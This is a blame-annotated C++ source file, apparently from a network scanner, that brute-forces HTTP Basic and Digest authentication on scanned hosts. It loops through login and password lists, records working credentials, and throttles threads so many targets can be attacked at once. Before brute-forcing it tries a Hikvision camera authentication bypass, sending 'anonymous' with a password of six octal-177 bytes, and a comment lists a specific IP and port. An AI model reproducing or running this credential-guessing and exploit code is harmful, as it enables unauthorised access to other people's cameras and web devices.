2015-03-22 00:43:15 +00:00
|
|
|
|
#include "BasicAuth.h"
|
2015-03-13 14:27:21 +00:00
|
|
|
|
|
2015-04-19 00:28:46 +00:00
|
|
|
|
int BA::checkOutput(const string *buffer, const char *ip, const int port) {
|
2015-04-16 11:51:51 +00:00
|
|
|
|
if((Utils::ustrstr(*buffer, "200 ok") != -1 ||
|
|
|
|
|
Utils::ustrstr(*buffer, "http/1.0 200") != -1 ||
|
|
|
|
|
Utils::ustrstr(*buffer, "http/1.1 200") != -1)
|
|
|
|
|
&& Utils::ustrstr(*buffer, "http/1.1 401 ") == -1
|
|
|
|
|
&& Utils::ustrstr(*buffer, "http/1.0 401 ") == -1
|
|
|
|
|
&& Utils::ustrstr(*buffer, "<statusValue>401</statusValue>") == -1
|
|
|
|
|
&& Utils::ustrstr(*buffer, "<statusString>Unauthorized</statusString>") == -1
|
|
|
|
|
&& Utils::ustrstr(*buffer, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>") == -1
|
|
|
|
|
&& Utils::ustrstr(*buffer, "Неправильны") == -1
|
2015-04-20 19:27:06 +00:00
|
|
|
|
&& Utils::ustrstr(*buffer, "code: \"401\"") == -1 //77.51.196.31:81
|
2015-03-16 14:29:34 +00:00
|
|
|
|
) {
|
2015-04-19 00:28:46 +00:00
|
|
|
|
return 1;
|
2015-03-22 00:43:15 +00:00
|
|
|
|
}
|
2015-04-19 09:33:26 +00:00
|
|
|
|
else if (Utils::ustrstr(*buffer, "http/1.1 404") != -1
|
2015-04-23 05:23:02 +00:00
|
|
|
|
|| Utils::ustrstr(*buffer, "http/1.0 404") != -1) return -2;
|
2015-04-16 11:51:51 +00:00
|
|
|
|
else if (Utils::ustrstr(*buffer, "503 service unavailable") != -1
|
|
|
|
|
|| Utils::ustrstr(*buffer, "http/1.1 503") != -1
|
|
|
|
|
|| Utils::ustrstr(*buffer, "http/1.0 503") != -1
|
|
|
|
|
|| Utils::ustrstr(*buffer, "400 BAD_REQUEST") != -1
|
|
|
|
|
|| Utils::ustrstr(*buffer, "400 bad request") != -1
|
|
|
|
|
|| Utils::ustrstr(*buffer, "403 Forbidden") != -1
|
2015-03-22 00:43:15 +00:00
|
|
|
|
)
|
|
|
|
|
{
|
|
|
|
|
Sleep(30000);
|
2015-04-19 00:28:46 +00:00
|
|
|
|
return -1;
|
2015-03-22 00:43:15 +00:00
|
|
|
|
}
|
2015-03-16 14:29:34 +00:00
|
|
|
|
|
2015-04-19 00:28:46 +00:00
|
|
|
|
return 0;
|
2015-03-16 14:29:34 +00:00
|
|
|
|
}
|
|
|
|
|
|
2015-04-19 00:02:30 +00:00
|
|
|
|
//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
|
|
|
|
|
inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) {
|
2015-04-20 19:27:44 +00:00
|
|
|
|
std::string lpString = string("anonymous") + ":" + string("\177\177\177\177\177\177");
|
2015-04-19 00:02:30 +00:00
|
|
|
|
|
|
|
|
|
string buffer;
|
2015-04-28 23:27:54 +00:00
|
|
|
|
Connector con;
|
|
|
|
|
int res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
|
2015-04-19 00:28:46 +00:00
|
|
|
|
if (res > 0) {
|
|
|
|
|
if (BA::checkOutput(&buffer, ip, port) == 1) return 1;
|
2015-04-19 00:02:30 +00:00
|
|
|
|
}
|
|
|
|
|
return 0;
|
|
|
|
|
}
|
|
|
|
|
|
2016-01-31 20:09:42 +00:00
|
|
|
|
std::string getLocation(const std::string *buff) {
|
|
|
|
|
std::string buffLower = *buff;
|
|
|
|
|
std::transform(buffLower.begin(), buffLower.end(), buffLower.begin(), ::tolower);
|
|
|
|
|
int pos1 = buffLower.find("location: ");
|
|
|
|
|
|
|
|
|
|
if (-1 != pos1) {
|
|
|
|
|
std::string location = buff->substr(pos1 + 10, buff->find("\r\n", pos1) - pos1 - 10);
|
|
|
|
|
return location;
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
return "";
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
void setNewIP(const char *ipOrig, char *ip, std::string *buff, int size) {
|
|
|
|
|
strncpy(ip, ipOrig, size);
|
|
|
|
|
const std::string &location = getLocation(buff);
|
|
|
|
|
if (location.size() > 0) {
|
|
|
|
|
if (Utils::ustrstr(location, "http") != -1) {
|
|
|
|
|
strncpy(ip, location.c_str(), size);
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
int ipLength = (int)strstr(ipOrig + 8, "/");
|
|
|
|
|
if (0 != ipLength) {
|
|
|
|
|
strncpy(ip, ipOrig, ipLength);
|
|
|
|
|
strncat(ip, location.c_str(), size - ipLength);
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
strncat(ip, location.c_str(), size);
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) {
|
2015-08-07 22:37:28 +00:00
|
|
|
|
bool digestMode = true;
|
|
|
|
|
string lpString;
|
2015-04-04 12:43:22 +00:00
|
|
|
|
lopaStr lps = {"UNKNOWN", "", ""};
|
2015-03-24 14:29:27 +00:00
|
|
|
|
int passCounter = 0;
|
2015-04-04 07:24:31 +00:00
|
|
|
|
int res = 0;
|
2015-08-07 22:37:28 +00:00
|
|
|
|
int rowIndex = -1;
|
2015-04-30 19:21:12 +00:00
|
|
|
|
|
|
|
|
|
std::string buff;
|
|
|
|
|
Connector con;
|
2015-08-07 22:37:28 +00:00
|
|
|
|
|
2016-01-31 20:09:42 +00:00
|
|
|
|
int sz = con.nConnect(ipOrig, port, &buff);
|
2016-01-07 03:55:10 +00:00
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
|
if (Utils::ustrstr(&buff, "404 not found") != -1 || Utils::ustrstr(&buff, "404 site") != -1) {
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
|
|
|
|
|
2016-01-31 20:09:42 +00:00
|
|
|
|
char ip[256] = { 0 };
|
|
|
|
|
|
|
|
|
|
if (sz == 0) {
|
|
|
|
|
if (performDoubleCheck) {
|
|
|
|
|
//Retry
|
|
|
|
|
Sleep(gTimeOut);
|
|
|
|
|
sz = con.nConnect(ip, port, &buff);
|
|
|
|
|
if (sz == 0) {
|
|
|
|
|
Sleep(gTimeOut);
|
|
|
|
|
sz = con.nConnect(ip, port, &buff);
|
|
|
|
|
if (sz == 0) {
|
|
|
|
|
QString ipString = QString(ip);
|
|
|
|
|
stt->doEmitionFoundData("<span style=\"color:orange;\">Empty BA probe - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
setNewIP(ipOrig, ip, &buff, 256);
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
setNewIP(ipOrig, ip, &buff, 256);
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
QString ipString = QString(ip);
|
2016-01-07 03:55:10 +00:00
|
|
|
|
stt->doEmitionFoundData("<span style=\"color:orange;\">Empty BA probe - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
2015-12-08 16:53:54 +00:00
|
|
|
|
}
|
2016-01-31 20:09:42 +00:00
|
|
|
|
else {
|
|
|
|
|
setNewIP(ipOrig, ip, &buff, 256);
|
|
|
|
|
}
|
|
|
|
|
|
2015-04-30 19:21:12 +00:00
|
|
|
|
int isDig = Utils::isDigest(&buff);
|
2016-02-28 16:07:10 +00:00
|
|
|
|
if (-2 == isDig) {
|
|
|
|
|
QString ipString = QString(ip);
|
|
|
|
|
stt->doEmitionFoundData("<span style=\"color:orange;\">404 not found - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
2015-04-25 19:45:01 +00:00
|
|
|
|
if (isDig == -1) {
|
2016-01-31 20:09:42 +00:00
|
|
|
|
if (performDoubleCheck) {
|
|
|
|
|
Sleep(gTimeOut);
|
|
|
|
|
int sz = con.nConnect(ip, port, &buff);
|
|
|
|
|
isDig = Utils::isDigest(&buff);
|
|
|
|
|
if (isDig == -1) {
|
|
|
|
|
Sleep(gTimeOut);
|
|
|
|
|
int sz = con.nConnect(ip, port, &buff);
|
|
|
|
|
isDig = Utils::isDigest(&buff);
|
|
|
|
|
if (isDig == -1) {
|
|
|
|
|
QString ipString = QString(ip);
|
|
|
|
|
stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 found - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
else {
|
|
|
|
|
QString ipString = QString(ip);
|
|
|
|
|
stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 found - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
2015-04-25 19:45:01 +00:00
|
|
|
|
}
|
2015-08-07 22:37:28 +00:00
|
|
|
|
else if (isDig == 1) digestMode = true;
|
|
|
|
|
else digestMode = false;
|
2015-03-16 14:29:34 +00:00
|
|
|
|
|
2015-04-28 23:27:54 +00:00
|
|
|
|
std::string buffer;
|
|
|
|
|
|
2015-04-19 00:02:30 +00:00
|
|
|
|
if (commenceHikvisionEx1(ip, port, digestMode)) {
|
|
|
|
|
strcpy(lps.login, "anonymous");
|
|
|
|
|
strcpy(lps.pass, "\177\177\177\177\177\177");
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
|
char login[32] = { 0 };
|
|
|
|
|
char pass[32] = { 0 };
|
2015-03-16 14:29:34 +00:00
|
|
|
|
for(int i = 0; i < MaxLogin; ++i) {
|
2016-02-28 16:07:10 +00:00
|
|
|
|
FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
|
|
|
|
|
strcpy(login, loginLst[i]);
|
2015-03-16 14:29:34 +00:00
|
|
|
|
for (int j = 0; j < MaxPass; ++j) {
|
2015-03-25 14:29:08 +00:00
|
|
|
|
FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
|
2015-03-16 14:29:34 +00:00
|
|
|
|
if (!globalScanFlag) return lps;
|
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
|
strcpy(pass, passLst[j]);
|
|
|
|
|
|
|
|
|
|
lpString = string(login) + ":" + string(pass);
|
2015-03-16 14:29:34 +00:00
|
|
|
|
|
2015-04-28 23:27:54 +00:00
|
|
|
|
Connector con;
|
|
|
|
|
res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
|
2016-02-28 16:07:10 +00:00
|
|
|
|
if (res == -2) {
|
|
|
|
|
rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "TIMEOUT", rowIndex);
|
|
|
|
|
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
2015-04-04 07:24:31 +00:00
|
|
|
|
else if (res != -1) {
|
2015-04-19 00:28:46 +00:00
|
|
|
|
res = checkOutput(&buffer, ip, port);
|
2015-04-23 05:23:02 +00:00
|
|
|
|
if (res == -2) {
|
2015-08-07 22:37:28 +00:00
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
|
rowIndex = Utils::addBARow(QString(ip), "--", "404", rowIndex);
|
2015-04-23 05:23:02 +00:00
|
|
|
|
strcpy(lps.other, "404");
|
|
|
|
|
return lps;
|
|
|
|
|
}
|
2015-04-19 00:28:46 +00:00
|
|
|
|
if (res == -1) {
|
|
|
|
|
++i;
|
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
if (res == 1) {
|
2016-02-28 16:07:10 +00:00
|
|
|
|
rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);
|
|
|
|
|
|
|
|
|
|
strcpy(lps.login, login);
|
|
|
|
|
strcpy(lps.pass, pass);
|
2015-04-04 07:24:31 +00:00
|
|
|
|
return lps;
|
|
|
|
|
};
|
|
|
|
|
}
|
2015-03-16 14:29:34 +00:00
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
|
rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
|
2015-08-07 22:37:28 +00:00
|
|
|
|
++passCounter;
|
|
|
|
|
Sleep(50);
|
2015-03-16 14:29:34 +00:00
|
|
|
|
}
|
|
|
|
|
}
|
2015-03-13 14:27:21 +00:00
|
|
|
|
|
2016-02-28 16:07:10 +00:00
|
|
|
|
rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
|
2015-03-16 14:29:34 +00:00
|
|
|
|
return lps;
|
2015-03-13 14:27:21 +00:00
|
|
|
|
}
|
|
|
|
|
|
2016-01-31 20:09:42 +00:00
|
|
|
|
lopaStr BA::BALobby(const char *ip, const int port, bool performDoubleCheck) {
|
2015-04-02 12:33:49 +00:00
|
|
|
|
if(gMaxBrutingThreads > 0) {
|
2015-03-13 14:27:21 +00:00
|
|
|
|
|
2015-04-02 12:33:49 +00:00
|
|
|
|
while(BrutingThrds >= gMaxBrutingThreads) Sleep(1000);
|
2015-03-13 14:27:21 +00:00
|
|
|
|
|
2015-04-04 12:43:22 +00:00
|
|
|
|
++baCount;
|
|
|
|
|
++BrutingThrds;
|
2016-01-24 19:03:28 +00:00
|
|
|
|
stt->doEmitionUpdateArc(gTargets);
|
2016-01-31 20:09:42 +00:00
|
|
|
|
const lopaStr &lps = BABrute(ip, port, performDoubleCheck);
|
2015-04-04 12:43:22 +00:00
|
|
|
|
--BrutingThrds;
|
2015-04-02 12:33:49 +00:00
|
|
|
|
|
|
|
|
|
return lps;
|
|
|
|
|
} else {
|
2015-04-04 12:43:22 +00:00
|
|
|
|
lopaStr lps = {"UNKNOWN", "", ""};
|
2015-04-02 12:33:49 +00:00
|
|
|
|
return lps;
|
|
|
|
|
}
|
2015-03-13 14:27:21 +00:00
|
|
|
|
}
|